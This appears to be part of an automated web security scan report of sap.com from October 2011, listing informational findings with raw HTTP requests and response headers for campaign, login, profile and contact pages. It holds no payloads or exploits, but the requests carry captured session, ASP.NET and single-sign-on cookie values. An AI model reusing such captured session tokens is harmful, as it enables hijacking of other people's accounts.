Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; a1slocale=en; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; mbox=session#1318688512533-813903#1318691765|check#true#1318689965; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Asdnweblogs%253Apopularposts%7C1318691705604%3B%20pe%3Dno%2520value%7C1318691705612%3B%20c3%3Dno%2520value%7C1318691705618%3B%20s_nr%3D1318689905628-New%7C1321281905628%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293505630%3B%20s_visit%3D1%7C1318691705632%3B%20gpv_p47%3Dno%2520value%7C1318691705635%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D5%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2f; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:45:01 GMT
Server: Apache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43374

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Top 25 Blog Pos
...[SNIP]...
22.5. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

Request

GET /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:12 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:12 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:32:12 GMT; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:12 GMT
Content-Length: 148981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="
...[SNIP]...
22.6. https://www.sap.com/contactsap/contact_warning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/contact_warning.epx

Request

GET /contactsap/contact_warning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3471
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:04 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:04 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:31 GMT
Connection: close


<html>
   <head>
       <title>SAP - Contact SAP Warning</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" cont
...[SNIP]...
22.7. https://www.sap.com/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/index.epx

Request

GET /contactsap/index.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sap.com/customer-showcase/innovation/index.epx?olt=CG4D999063
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:40 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:40 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:40 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:40 GMT
Content-Length: 75986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
22.8. https://www.sap.com/host.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /host.epx

Request

GET /host.epx?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-US10-SGE-FRBUSOPT; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; OriginatingURL=http://www.sapbusinessoptimizer.com/; SingleSignOnURL=51a3d747-8c02-417d-8f96-ae6e0ddd405d||||http://www.sapbusinessoptimizer.com/|; pmeoriginalurl=%2fhost.epx; pmereturnurl=%2fgwtservice.epx; pmelayerurl=%2fprofile%2flogin.epx%3fCCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220%26pmelayer%3dtrue; pmedialogmode=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:16 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:16 GMT; path=/
Set-Cookie: pmelayerurl=; domain=.sap.com; path=/
Set-Cookie: pmedialogmode=; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:30:15 GMT
Content-Length: 32896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
22.9. https://www.sap.com/profile/login.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/login.epx

Request

GET /profile/login.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/about-sap/events/worldtour/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:45 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:45 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:46 GMT
Content-Length: 90895


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
22.10. https://www.sap.com/profile/slogin.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/slogin.epx

Request

POST /profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 432
Cache-Control: max-age=0
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.sap.com/profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

__EVENTTARGET=mobjTemplate%24loginctrl%24lnkPassword&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTIxMTM5MzQyNTkPZBYCAgUPZBYCAgMPZBYCZg9kFgICFw9kFgJmD2QWAgIBDxYCHghSZWZlcnJlcgUlL2Fib3V0LXNhcC9ldmVudHMvd29y
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:05 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:05 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:06 GMT
Content-Length: 11252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
22.11. https://www.sap.com/profile/warning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/warning.epx

Request

GET /profile/warning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5057
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:52 GMT
Connection: close


<html>
   <head>
       <title>SAP - PLEASE REVIEW YOUR REGISTRATION.</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-L
...[SNIP]...
22.12. https://www.sap.com/sme/contactsap/FormCodesRemote.epi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/FormCodesRemote.epi

Request

POST /sme/contactsap/FormCodesRemote.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 86
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|

{"method":"GetCodeTranslationsByParentCategoryWithLocaleID","arguments":[1,"",2,1033]}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:32 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:32 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:31 GMT
Content-Length: 36

"new Array(1,'',2,1033,new Array())"
22.13. https://www.sap.com/sme/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Request

GET /sme/contactsap/index.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/search/search-results.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:25 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:25 GMT
Content-Length: 87585


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
22.14. https://www.sme.sap.com/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html

Request

GET /irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.sme.sap.com/irj/sme/logon
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; 